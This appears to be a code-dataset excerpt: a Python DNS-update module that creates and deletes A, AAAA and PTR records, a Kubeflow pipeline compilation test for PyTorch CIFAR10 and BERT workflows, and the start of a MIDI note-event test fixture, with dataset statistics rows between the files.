# Check the SOA, we don't want to write to a parent zone if it has delegated authority
soa = get_soa(dns_name)
if soa == zone.name:
record_type = 'A' if address.version == 4 else 'AAAA'
update = zone.server.create_update(zone.name)
update.add(
dns_name,
zone.ttl,
record_type,
str(address)
)
response = dns.query.udp(update, zone.server.address)
status_update(output, f'Adding {dns_name} {record_type} {address}', response)
if status:
status.forward_rcode = response.rcode()
else:
logger.warning(f"Can't update zone {zone.name} for {dns_name}, "
f"it has delegated authority for {soa}")
if status:
status.forward_rcode = rcode.NOTAUTH
else:
logger.debug(f"No zone found for {dns_name}")
if status:
status.forward_rcode = RCODE_NO_ZONE
def delete_forward(dns_name: str, address: ip.IPAddress, status: Optional[DNSStatus], output: List[str]):
if status:
status.forward_action = ACTION_DELETE
zone = Zone.objects.find_for_dns_name(dns_name)
if zone:
logger.debug(f"Found zone {zone.name} for {dns_name}")
# Check the SOA, we don't want to write to a parent zone if it has delegated authority
soa = get_soa(dns_name)
if soa == zone.name:
record_type = 'A' if address.version == 4 else 'AAAA'
update = zone.server.create_update(zone.name)
update.delete(
dns_name,
record_type,
str(address)
)
response = dns.query.udp(update, zone.server.address)
status_update(output, f'Deleting {dns_name} {record_type} {address}', response)
if status:
status.forward_rcode = response.rcode()
else:
logger.warning(f"Can't update zone {zone.name} {dns_name}, "
f"it has delegated authority for {soa}")
if status:
status.forward_rcode = rcode.NOTAUTH
else:
logger.debug(f"No zone found for {dns_name}")
if status:
status.forward_rcode = RCODE_NO_ZONE
def create_reverse(dns_name: str, address: ip.IPAddress, status: Optional[DNSStatus], output: List[str]):
if status:
status.reverse_action = ACTION_CREATE
zone = ReverseZone.objects.find_for_address(address)
if zone:
record_name = zone.record_name(address)
logger.debug(f"Found zone {zone.name} for {record_name}")
# Check the SOA, we don't want to write to a parent zone if it has delegated authority
soa = get_soa(record_name)
if soa == zone.name:
update = zone.server.create_update(zone.name)
update.add(
record_name,
zone.ttl,
'ptr',
dns_name
)
response = dns.query.udp(update, zone.server.address)
status_update(output, f'Adding {record_name} PTR {dns_name}', response)
if status:
status.reverse_rcode = response.rcode()
else:
logger.warning(f"Can't update zone {zone.name} for {record_name}, "
f"it has delegated authority for {soa}")
if status:
status.reverse_rcode = rcode.NOTAUTH
else:
logger.debug(f"No zone found for {address}")
if status:
status.reverse_rcode = RCODE_NO_ZONE
def delete_reverse(dns_name: str, address: ip.IPAddress, status: Optional[DNSStatus], output: List[str]):
if status:
status.reverse_action = ACTION_DELETE
zone = ReverseZone.objects.find_for_address(address)
if zone:
record_name = zone.record_name(address)
logger.debug(f"Found zone {zone.name} for {record_name}")
# Check the SOA, we don't want to write to a parent zone if it has delegated authority
soa = get_soa(record_name)
if soa == zone.name:
update = zone.server.create_update(zone.name)
update.delete(
record_name,
'ptr',
dns_name
)
response = dns.query.udp(update, zone.server.address)
status_update(output, f'Deleting {record_name} PTR {dns_name}', response)
if status:
status.reverse_rcode = response.rcode()
else:
logger.warning(f"Can't update zone {zone.name} for {record_name}, "
f"it has delegated authority for {soa}")
if status:
status.reverse_rcode = rcode.NOTAUTH
else:
logger.debug(f"No zone found for {address}")
if status:
status.reverse_rcode = RCODE_NO_ZONE
@job
def dns_create(dns_name: str, address: ip.IPAddress, forward=True, reverse=True, status: DNSStatus = None):
output = []
if forward:
create_forward(dns_name, address, status, output)
if reverse:
create_reverse(dns_name, address, status, output)
if status:
try:
status.save()
except IntegrityError:
# Race condition when creating?
status.save(force_update=True)
return ', '.join(output)
@job
def dns_delete(dns_name: str, address: ip.IPAddress, forward=True, reverse=True, status: DNSStatus = None):
output = []
if forward:
delete_forward(dns_name, address, status, output)
if reverse:
delete_reverse(dns_name, address, status, output)
if status:
try:
status.save()
except IntegrityError:
# Race condition when creating?
status.save(force_update=True)
return ', '.join(output)
| 34.765
| 107
| 0.605494
| 861
| 6,953
| 4.749129
| 0.119628
| 0.051357
| 0.054781
| 0.041086
| 0.833456
| 0.833456
| 0.827342
| 0.827342
| 0.806799
| 0.802397
| 0
| 0.000412
| 0.30174
| 6,953
| 200
| 108
| 34.765
| 0.841813
| 0.057385
| 0
| 0.726708
| 0
| 0
| 0.129811
| 0.003818
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.068323
| 0
| 0.124224
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b956c06f63b4e768d5d871a9524b57a459282b65
| 32,906
|
py
|
Python
|
components/PyTorch/pytorch-kfp-components/tests/test_compile_yamls.py
|
nostro-im/pipelines
|
39f5b6b74040abbf4b764cbd5b422d7548723d9e
|
[
"Apache-2.0"
] | 2,860
|
2018-05-24T04:55:01.000Z
|
2022-03-31T13:49:56.000Z
|
components/PyTorch/pytorch-kfp-components/tests/test_compile_yamls.py
|
nostro-im/pipelines
|
39f5b6b74040abbf4b764cbd5b422d7548723d9e
|
[
"Apache-2.0"
] | 7,331
|
2018-05-16T09:03:26.000Z
|
2022-03-31T23:22:04.000Z
|
components/PyTorch/pytorch-kfp-components/tests/test_compile_yamls.py
|
nostro-im/pipelines
|
39f5b6b74040abbf4b764cbd5b422d7548723d9e
|
[
"Apache-2.0"
] | 1,359
|
2018-05-15T11:05:41.000Z
|
2022-03-31T09:42:09.000Z
|
#!/usr/bin/env/python3
#
# Copyright (c) Facebook, Inc. and its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#pylint: disable=not-callable,unused-variable
"""Test for component compilation."""
import os
import unittest
import json
import pytest
from kfp import components
from kfp.components import load_component_from_file
from kfp import dsl
from kfp import compiler
tests_dir, _ = os.path.split(os.path.abspath(__file__))
templates_dir = os.path.join(os.path.dirname(tests_dir), "templates")
BERT_COMPONENTS = {
"component_bert_prep":
components.
load_component_from_file(f"{templates_dir}/preprocess_component.yaml"),
"component_bert_train":
components.
load_component_from_file(f"{templates_dir}/train_component.yaml"),
}
CIFAR_COMPONENTS = {
"component_cifar10_prep":
components.
load_component_from_file(f"{templates_dir}/preprocess_component.yaml"),
"component_cifar10_train":
components.
load_component_from_file(f"{templates_dir}/train_component.yaml"),
}
COMPONENT_TB = load_component_from_file(
f"{templates_dir}/tensorboard_component.yaml"
)
COMPONENT_DEPLOY = load_component_from_file(
f"{templates_dir}/deploy_component.yaml"
)
COMPONENT_MNIO = components.load_component_from_file(
f"{templates_dir}/minio_component.yaml"
)
PRED_OP = load_component_from_file(f"{templates_dir}/prediction_component.yaml")
class ComponentCompileTest(unittest.TestCase): #pylint: disable=too-many-instance-attributes
"""Test cases for compilation of yamls."""
def setUp(self):
"""Set up."""
super().setUp()
self.input_request = "./compile_test.json"
self.deploy_name_bert = "bertserve"
self.namespace = "kubeflow-user-example-com"
self.experiment = "Default"
self.minio_endpoint = "http://minio-service.kubeflow:9000"
self.log_bucket = "mlpipeline"
self.tensorboard_image = "public.ecr.aws/pytorch-samples/tboard:latest"
self.deploy_name_cifar = "torchserve"
self.model_name = "cifar10"
self.isvc_name = (
self.deploy_name_cifar + "." + self.namespace + "." + "example.com"
)
self.cookie = ""
self.ingress_gateway = (
"http://istio-ingressgateway.istio-system.svc.cluster.local"
)
def test_cifar10_compile(self):
"""Test Cifar10 yamls compile."""
@dsl.pipeline(
name="Training Cifar10 pipeline",
description="Cifar 10 dataset pipeline",
) #pylint: disable=too-many-arguments,too-many-locals
def pytorch_cifar10(
minio_endpoint=self.minio_endpoint,
log_bucket=self.log_bucket,
log_dir=f"tensorboard/logs/{dsl.RUN_ID_PLACEHOLDER}",
mar_path=f"mar/{dsl.RUN_ID_PLACEHOLDER}/model-store",
config_prop_path=f"mar/{dsl.RUN_ID_PLACEHOLDER}/config",
model_uri=f"s3://mlpipeline/mar/{dsl.RUN_ID_PLACEHOLDER}",
tf_image=self.tensorboard_image,
deploy=self.deploy_name_cifar,
namespace=self.namespace,
confusion_matrix_log_dir=f"confusion_matrix"
f"/{dsl.RUN_ID_PLACEHOLDER}/",
checkpoint_dir="checkpoint_dir/cifar10",
):
"""Cifar10 pipelines."""
pod_template_spec = json.dumps({
"spec": {
"containers": [{
"env": [
{
"name": "AWS_ACCESS_KEY_ID",
"valueFrom": {
"secretKeyRef": {
"name": "mlpipeline-minio-artifact",
"key": "accesskey",
}
},
},
{
"name": "AWS_SECRET_ACCESS_KEY",
"valueFrom": {
"secretKeyRef": {
"name": "mlpipeline-minio-artifact",
"key": "secretkey",
}
},
},
{
"name": "AWS_REGION",
"value": "minio"
},
{
"name": "S3_ENDPOINT",
"value": f"{minio_endpoint}",
},
{
"name": "S3_USE_HTTPS",
"value": "0"
},
{
"name": "S3_VERIFY_SSL",
"value": "0"
},
]
}]
}
})
prepare_tb_task = COMPONENT_TB(
log_dir_uri=f"s3://{log_bucket}/{log_dir}",
image=tf_image,
pod_template_spec=pod_template_spec,
).set_display_name("Visualization")
component_cifar10_prep = CIFAR_COMPONENTS["component_cifar10_prep"]
prep_task = (
component_cifar10_prep().after(prepare_tb_task).
set_display_name("Preprocess & Transform")
)
component_cifar10_train = CIFAR_COMPONENTS["component_cifar10_train"
]
confusion_matrix_url = \
f"minio://{log_bucket}/{confusion_matrix_log_dir}"
script_args = f"model_name=resnet.pth," \
f"confusion_matrix_url={confusion_matrix_url}"
# For gpus, set number of gpus and accelerator type
ptl_args = "max_epochs=1, " \
"gpus=0, " \
"accelerator=None, " \
"profiler=pytorch"
train_task = (
component_cifar10_train(
input_data=prep_task.outputs["output_data"],
script_args=script_args,
ptl_arguments=ptl_args
).after(prep_task).set_display_name("Training")
)
minio_tb_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=log_dir,
input_path=train_task.outputs["tensorboard_root"],
filename="",
).after(train_task
).set_display_name("Tensorboard Events Pusher")
)
minio_checkpoint_dir_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=checkpoint_dir,
input_path=train_task.outputs["checkpoint_dir"],
filename="",
).after(train_task).set_display_name("checkpoint_dir Pusher")
)
minio_mar_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=mar_path,
input_path=train_task.outputs["checkpoint_dir"],
filename="cifar10_test.mar",
).after(train_task).set_display_name("Mar Pusher")
)
minio_config_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=config_prop_path,
input_path=train_task.outputs["checkpoint_dir"],
filename="config.properties",
).after(train_task).set_display_name("Conifg Pusher")
)
model_uri = str(model_uri)
isvc_yaml = """
apiVersion: "serving.kubeflow.org/v1beta1"
kind: "InferenceService"
metadata:
name: {}
namespace: {}
spec:
predictor:
serviceAccountName: sa
pytorch:
storageUri: {}
resources:
limits:
memory: 4Gi
""".format(deploy, namespace, model_uri)
# For GPU inference use below yaml with gpu count and accelerator
gpu_count = "1"
accelerator = "nvidia-tesla-p4"
isvc_gpu_yaml = """
apiVersion: "serving.kubeflow.org/v1beta1"
kind: "InferenceService"
metadata:
name: {}
namespace: {}
spec:
predictor:
serviceAccountName: sa
pytorch:
storageUri: {}
resources:
limits:
memory: 4Gi
nvidia.com/gpu: {}
nodeSelector:
cloud.google.com/gke-accelerator: {}
""".format(deploy, namespace, model_uri, gpu_count, accelerator)
# Update inferenceservice_yaml for GPU inference
deploy_task = (
COMPONENT_DEPLOY(
action="apply", inferenceservice_yaml=isvc_yaml
).after(minio_mar_upload).set_display_name("Deployer")
)
pred_task = (
PRED_OP(
host_name=self.isvc_name,
input_request=self.input_request,
cookie=self.cookie,
url=self.ingress_gateway,
model=self.model_name,
inference_type="predict",
).after(deploy_task).set_display_name("Prediction")
)
explain_task = (
PRED_OP(
host_name=self.isvc_name,
input_request=self.input_request,
cookie=self.cookie,
url=self.ingress_gateway,
model=self.model_name,
inference_type="explain",
).after(pred_task).set_display_name("Explanation")
)
compiler.Compiler().compile(
pytorch_cifar10, "pytorch.tar.gz", type_check=True
)
def test_bert_compile(self):
"""Test bert yamls compilation."""
@dsl.pipeline(
name="Training pipeline", description="Sample training job test"
) #pylint: disable=too-many-arguments,too-many-locals
def pytorch_bert(
minio_endpoint=self.minio_endpoint,
log_bucket=self.log_bucket,
log_dir=f"tensorboard/logs/{dsl.RUN_ID_PLACEHOLDER}",
mar_path=f"mar/{dsl.RUN_ID_PLACEHOLDER}/model-store",
config_prop_path=f"mar/{dsl.RUN_ID_PLACEHOLDER}/config",
model_uri=f"s3://mlpipeline/mar/{dsl.RUN_ID_PLACEHOLDER}",
tf_image=self.tensorboard_image,
deploy=self.deploy_name_bert,
namespace=self.namespace,
confusion_matrix_log_dir=
f"confusion_matrix/{dsl.RUN_ID_PLACEHOLDER}/",
num_samples=1000,
max_epochs=1
):
"""Bert Pipeline."""
prepare_tb_task = COMPONENT_TB(
log_dir_uri=f"s3://{log_bucket}/{log_dir}",
image=tf_image,
pod_template_spec=json.dumps({
"spec": {
"containers": [{
"env": [
{
"name": "AWS_ACCESS_KEY_ID",
"valueFrom": {
"secretKeyRef": {
"name": "mlpipeline-minio-artifact",
"key": "accesskey",
}
},
},
{
"name": "AWS_SECRET_ACCESS_KEY",
"valueFrom": {
"secretKeyRef": {
"name": "mlpipeline-minio-artifact",
"key": "secretkey",
}
},
},
{
"name": "AWS_REGION",
"value": "minio",
},
{
"name": "S3_ENDPOINT",
"value": f"{minio_endpoint}",
},
{
"name": "S3_USE_HTTPS",
"value": "0"
},
{
"name": "S3_VERIFY_SSL",
"value": "0"
},
]
}]
}
}),
).set_display_name("Visualization")
component_bert_prep = BERT_COMPONENTS["component_bert_prep"]
prep_task = (
component_bert_prep().after(prepare_tb_task).
set_display_name("Preprocess & Transform")
)
component_bert_train = BERT_COMPONENTS["component_bert_train"]
confusion_matrix_url = \
f"minio://{log_bucket}/{confusion_matrix_log_dir}"
script_args = f"model_name=bert.pth," \
f"num_samples={num_samples}," \
f"confusion_matrix_url={confusion_matrix_url}"
# For gpus, set number of gpus and accelerator type
ptl_args = f"max_epochs={max_epochs}," \
"profiler=pytorch," \
"gpus=0," \
"accelerator=None"
train_task = (
component_bert_train(
input_data=prep_task.outputs["output_data"],
script_args=script_args,
ptl_arguments=ptl_args
).after(prep_task).set_display_name("Training")
)
minio_tb_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=log_dir,
input_path=train_task.outputs["tensorboard_root"],
filename="",
).after(train_task
).set_display_name("Tensorboard Events Pusher")
)
minio_mar_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=mar_path,
input_path=train_task.outputs["checkpoint_dir"],
filename="bert_test.mar",
).after(train_task).set_display_name("Mar Pusher")
)
minio_config_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=config_prop_path,
input_path=train_task.outputs["checkpoint_dir"],
filename="config.properties",
).after(train_task).set_display_name("Conifg Pusher")
)
model_uri = str(model_uri)
isvc_yaml = """
apiVersion: "serving.kubeflow.org/v1beta1"
kind: "InferenceService"
metadata:
name: {}
namespace: {}
spec:
predictor:
serviceAccountName: sa
pytorch:
storageUri: {}
resources:
limits:
memory: 4Gi
""".format(deploy, namespace, model_uri)
# For GPU inference use below yaml with gpu count and accelerator
gpu_count = "1"
accelerator = "nvidia-tesla-p4"
isvc_gpu_yaml = """
apiVersion: "serving.kubeflow.org/v1beta1"
kind: "InferenceService"
metadata:
name: {}
namespace: {}
spec:
predictor:
serviceAccountName: sa
pytorch:
storageUri: {}
resources:
limits:
memory: 4Gi
nvidia.com/gpu: {}
nodeSelector:
cloud.google.com/gke-accelerator: {}
""".format(deploy, namespace, model_uri, gpu_count, accelerator)
# Update inferenceservice_yaml for GPU inference
deploy_task = (
COMPONENT_DEPLOY(
action="apply", inferenceservice_yaml=isvc_yaml
).after(minio_mar_upload).set_display_name("Deployer")
)
compiler.Compiler().compile(
pytorch_bert, "pytorch.tar.gz", type_check=True
)
def test_cifar10_compile_fail(self):
"""Test Cifar10 yamls compile."""
@dsl.pipeline(
name="Training Cifar10 pipeline",
description="Cifar 10 dataset pipeline",
) #pylint: disable=too-many-arguments,too-many-locals
def pytorch_cifar10(
minio_endpoint=self.minio_endpoint,
log_bucket=self.log_bucket,
log_dir=f"tensorboard/logs/{dsl.RUN_ID_PLACEHOLDER}",
mar_path=f"mar/{dsl.RUN_ID_PLACEHOLDER}/model-store",
config_prop_path=f"mar/{dsl.RUN_ID_PLACEHOLDER}/config",
model_uri=f"s3://mlpipeline/mar/{dsl.RUN_ID_PLACEHOLDER}",
tf_image=self.tensorboard_image,
deploy=self.deploy_name_cifar,
namespace=self.namespace,
confusion_matrix_log_dir=f"confusion_matrix"
f"/{dsl.RUN_ID_PLACEHOLDER}/", #pylint: disable=f-string-without-interpolation
checkpoint_dir=f"checkpoint_dir/cifar10",
):
"""Cifar10 pipelines."""
pod_template_spec = json.dumps({
"spec": {
"containers": [{
"env": [
{
"name": "AWS_ACCESS_KEY_ID",
"valueFrom": {
"secretKeyRef": {
"name": "mlpipeline-minio-artifact",
"key": "accesskey",
}
},
},
{
"name": "AWS_SECRET_ACCESS_KEY",
"valueFrom": {
"secretKeyRef": {
"name": "mlpipeline-minio-artifact",
"key": "secretkey",
}
},
},
{
"name": "AWS_REGION",
"value": "minio"
},
{
"name": "S3_ENDPOINT",
"value": f"{minio_endpoint}",
},
{
"name": "S3_USE_HTTPS",
"value": "0"
},
{
"name": "S3_VERIFY_SSL",
"value": "0"
},
]
}]
}
})
prepare_tb_task = COMPONENT_TB(
log_dir_uri=f"s3://{log_bucket}/{log_dir}",
image=tf_image,
pod_template_spec=pod_template_spec,
).set_display_name("Visualization")
component_cifar10_prep = ""
prep_task = (
component_cifar10_prep().after(prepare_tb_task).
set_display_name("Preprocess & Transform")
)
confusion_matrix_url = \
f"minio://{log_bucket}/{confusion_matrix_log_dir}"
script_args = f"model_name=resnet.pth," \
f"confusion_matrix_url={confusion_matrix_url}"
# For gpus, set number of gpus and accelerator type
ptl_args = "max_epochs=1, " \
"gpus=0, " \
"accelerator=None, " \
"profiler=pytorch"
component_cifar10_train = ""
train_task = (
component_cifar10_train(
input_data=prep_task.outputs["output_data"],
script_args=script_args,
ptl_arguments=ptl_args
).after(prep_task).set_display_name("Training")
)
minio_tb_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=log_dir,
input_path=train_task.outputs["tensorboard_root"],
filename="",
).after(train_task
).set_display_name("Tensorboard Events Pusher")
)
minio_checkpoint_dir_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=checkpoint_dir,
input_path=train_task.outputs["checkpoint_dir"],
filename="",
).after(train_task).set_display_name("checkpoint_dir Pusher")
)
minio_mar_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=mar_path,
input_path=train_task.outputs["checkpoint_dir"],
filename="cifar10_test.mar",
).after(train_task).set_display_name("Mar Pusher")
)
minio_config_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=config_prop_path,
input_path=train_task.outputs["checkpoint_dir"],
filename="config.properties",
).after(train_task).set_display_name("Conifg Pusher")
)
model_uri = str(model_uri)
isvc_yaml = """
apiVersion: "serving.kubeflow.org/v1beta1"
kind: "InferenceService"
metadata:
name: {}
namespace: {}
spec:
predictor:
serviceAccountName: sa
pytorch:
storageUri: {}
resources:
limits:
memory: 4Gi
""".format(deploy, namespace, model_uri)
# For GPU inference use below yaml with gpu count and accelerator
gpu_count = "1"
accelerator = "nvidia-tesla-p4"
isvc_gpu_yaml = """
apiVersion: "serving.kubeflow.org/v1beta1"
kind: "InferenceService"
metadata:
name: {}
namespace: {}
spec:
predictor:
serviceAccountName: sa
pytorch:
storageUri: {}
resources:
limits:
memory: 4Gi
nvidia.com/gpu: {}
nodeSelector:
cloud.google.com/gke-accelerator: {}
""".format(deploy, namespace, model_uri, gpu_count, accelerator)
# Update inferenceservice_yaml for GPU inference
deploy_task = (
COMPONENT_DEPLOY(
action="apply", inferenceservice_yaml=isvc_yaml
).after(minio_mar_upload).set_display_name("Deployer")
)
pred_task = (
PRED_OP(
host_name=self.isvc_name,
input_request=self.input_request,
cookie=self.cookie,
url=self.ingress_gateway,
model=self.model_name,
inference_type="predict",
).after(deploy_task).set_display_name("Prediction")
)
explain_task = (
PRED_OP(
host_name=self.isvc_name,
input_request=self.input_request,
cookie=self.cookie,
url=self.ingress_gateway,
model=self.model_name,
inference_type="explain",
).after(pred_task).set_display_name("Explanation")
)
with pytest.raises(TypeError):
compiler.Compiler().compile(
pytorch_cifar10, "pytorch.tar.gz", type_check=True
)
def test_bert_compile_fail(self):
"""Test bert yamls compilation."""
@dsl.pipeline(
name="Training pipeline", description="Sample training job test"
) #pylint: disable=too-many-arguments,too-many-locals
def pytorch_bert(
minio_endpoint=self.minio_endpoint,
log_bucket=self.log_bucket,
log_dir=f"tensorboard/logs/{dsl.RUN_ID_PLACEHOLDER}",
mar_path=f"mar/{dsl.RUN_ID_PLACEHOLDER}/model-store",
config_prop_path=f"mar/{dsl.RUN_ID_PLACEHOLDER}/config",
model_uri=f"s3://mlpipeline/mar/{dsl.RUN_ID_PLACEHOLDER}",
tf_image=self.tensorboard_image,
deploy=self.deploy_name_bert,
namespace=self.namespace,
confusion_matrix_log_dir=
f"confusion_matrix/{dsl.RUN_ID_PLACEHOLDER}/",
num_samples=1000,
max_epochs=1
):
"""Bert Pipeline."""
prepare_tb_task = COMPONENT_TB(
log_dir_uri=f"s3://{log_bucket}/{log_dir}",
image=tf_image,
pod_template_spec=json.dumps({
"spec": {
"containers": [{
"env": [
{
"name": "AWS_ACCESS_KEY_ID",
"valueFrom": {
"secretKeyRef": {
"name": "mlpipeline-minio-artifact",
"key": "accesskey",
}
},
},
{
"name": "AWS_SECRET_ACCESS_KEY",
"valueFrom": {
"secretKeyRef": {
"name": "mlpipeline-minio-artifact",
"key": "secretkey",
}
},
},
{
"name": "AWS_REGION",
"value": "minio",
},
{
"name": "S3_ENDPOINT",
"value": f"{minio_endpoint}",
},
{
"name": "S3_USE_HTTPS",
"value": "0"
},
{
"name": "S3_VERIFY_SSL",
"value": "0"
},
]
}]
}
}),
).set_display_name("Visualization")
component_bert_prep = ""
prep_task = (
component_bert_prep().after(prepare_tb_task).
set_display_name("Preprocess & Transform")
)
confusion_matrix_url = \
f"minio://{log_bucket}/{confusion_matrix_log_dir}"
script_args = f"model_name=bert.pth," \
f"num_samples={num_samples}," \
f"confusion_matrix_url={confusion_matrix_url}"
# For gpus, set number of gpus and accelerator type
ptl_args = f"max_epochs={max_epochs}," \
"profiler=pytorch," \
"gpus=0," \
"accelerator=None"
component_bert_train = ""
train_task = (
component_bert_train(
input_data=prep_task.outputs["output_data"],
script_args=script_args,
ptl_arguments=ptl_args
).after(prep_task).set_display_name("Training")
)
minio_tb_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=log_dir,
input_path=train_task.outputs["tensorboard_root"],
filename="",
).after(train_task
).set_display_name("Tensorboard Events Pusher")
)
minio_mar_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=mar_path,
input_path=train_task.outputs["checkpoint_dir"],
filename="bert_test.mar",
).after(train_task).set_display_name("Mar Pusher")
)
minio_config_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=config_prop_path,
input_path=train_task.outputs["checkpoint_dir"],
filename="config.properties",
).after(train_task).set_display_name("Conifg Pusher")
)
model_uri = str(model_uri)
isvc_yaml = """
apiVersion: "serving.kubeflow.org/v1beta1"
kind: "InferenceService"
metadata:
name: {}
namespace: {}
spec:
predictor:
serviceAccountName: sa
pytorch:
storageUri: {}
resources:
limits:
memory: 4Gi
""".format(deploy, namespace, model_uri)
# For GPU inference use below yaml with gpu count and accelerator
gpu_count = "1"
accelerator = "nvidia-tesla-p4"
isvc_gpu_yaml = """
apiVersion: "serving.kubeflow.org/v1beta1"
kind: "InferenceService"
metadata:
name: {}
namespace: {}
spec:
predictor:
serviceAccountName: sa
pytorch:
storageUri: {}
resources:
limits:
memory: 4Gi
nvidia.com/gpu: {}
nodeSelector:
cloud.google.com/gke-accelerator: {}
""".format(deploy, namespace, model_uri, gpu_count, accelerator)
# Update inferenceservice_yaml for GPU inference
deploy_task = (
COMPONENT_DEPLOY(
action="apply", inferenceservice_yaml=isvc_yaml
).after(minio_mar_upload).set_display_name("Deployer")
)
with pytest.raises(TypeError):
compiler.Compiler().compile(
pytorch_bert, "pytorch.tar.gz", type_check=True
)
| 40.37546
| 93
| 0.451164
| 2,619
| 32,906
| 5.365025
| 0.108438
| 0.024198
| 0.033877
| 0.033307
| 0.879439
| 0.873247
| 0.873247
| 0.865988
| 0.8588
| 0.8588
| 0
| 0.008274
| 0.460068
| 32,906
| 814
| 94
| 40.425061
| 0.782574
| 0.055552
| 0
| 0.766938
| 0
| 0
| 0.281058
| 0.08251
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012195
| false
| 0
| 0.01084
| 0
| 0.02439
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b96398ce2b2484870e06a3cf742d351f47fa15cc
| 4,543
|
py
|
Python
|
test/mary_test.py
|
blowfeld/python-midi-io
|
8dd5c7fabc29bc407a6fb8987538c7a9dce68d94
|
[
"MIT"
] | 1
|
2020-10-19T08:12:35.000Z
|
2020-10-19T08:12:35.000Z
|
test/mary_test.py
|
blowfeld/python-midi-io
|
8dd5c7fabc29bc407a6fb8987538c7a9dce68d94
|
[
"MIT"
] | 3
|
2017-11-18T16:46:01.000Z
|
2021-11-20T22:55:38.000Z
|
test/mary_test.py
|
blowfeld/python-midi-io
|
8dd5c7fabc29bc407a6fb8987538c7a9dce68d94
|
[
"MIT"
] | null | null | null |
from midiio.events import *
from midiio.containers import *
MARY_MIDI = Pattern(tracks=[[TimeSignatureMetaEvent(tick=0, nominator=4,
denominator=2, metronome=24, thirtyseconds_per_quarter=8),
KeySignatureMetaEvent(tick=0, alternatives=0, minor=0),
EndOfTrackMetaEvent(tick=1)],
[ControlChangeEvent(tick=0, channel=0, control=91, value=58),
ControlChangeEvent(tick=0, channel=0, control=10, value=69),
ControlChangeEvent(tick=0, channel=0, control=0, value=0),
ControlChangeEvent(tick=0, channel=0, control=32, value=0),
ProgramChangeEvent(tick=0, channel=0, value=24),
NoteOnEvent(tick=0, channel=0, pitch=64, velocity=72),
NoteOnEvent(tick=0, channel=0, pitch=55, velocity=70),
NoteOnEvent(tick=231, channel=0, pitch=64, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=62, velocity=72),
NoteOnEvent(tick=231, channel=0, pitch=62, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=60, velocity=71),
NoteOnEvent(tick=231, channel=0, pitch=60, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=62, velocity=79),
NoteOnEvent(tick=206, channel=0, pitch=55, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=62, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=64, velocity=85),
NoteOnEvent(tick=0, channel=0, pitch=55, velocity=79),
NoteOnEvent(tick=231, channel=0, pitch=64, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=64, velocity=78),
NoteOnEvent(tick=231, channel=0, pitch=64, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=64, velocity=74),
NoteOnEvent(tick=462, channel=0, pitch=55, velocity=0),
NoteOnEvent(tick=0, channel=0, pitch=64, velocity=0),
NoteOnEvent(tick=50, channel=0, pitch=62, velocity=75),
NoteOnEvent(tick=0, channel=0, pitch=55, velocity=77),
NoteOnEvent(tick=231, channel=0, pitch=62, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=62, velocity=77),
NoteOnEvent(tick=231, channel=0, pitch=62, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=62, velocity=75),
NoteOnEvent(tick=462, channel=0, pitch=55, velocity=0),
NoteOnEvent(tick=0, channel=0, pitch=62, velocity=0),
NoteOnEvent(tick=50, channel=0, pitch=64, velocity=82),
NoteOnEvent(tick=0, channel=0, pitch=55, velocity=79),
NoteOnEvent(tick=231, channel=0, pitch=64, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=67, velocity=84),
NoteOnEvent(tick=231, channel=0, pitch=67, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=67, velocity=75),
NoteOnEvent(tick=462, channel=0, pitch=55, velocity=0),
NoteOnEvent(tick=0, channel=0, pitch=67, velocity=0),
NoteOnEvent(tick=50, channel=0, pitch=64, velocity=73),
NoteOnEvent(tick=0, channel=0, pitch=55, velocity=78),
NoteOnEvent(tick=231, channel=0, pitch=64, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=62, velocity=69),
NoteOnEvent(tick=231, channel=0, pitch=62, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=60, velocity=71),
NoteOnEvent(tick=231, channel=0, pitch=60, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=62, velocity=80),
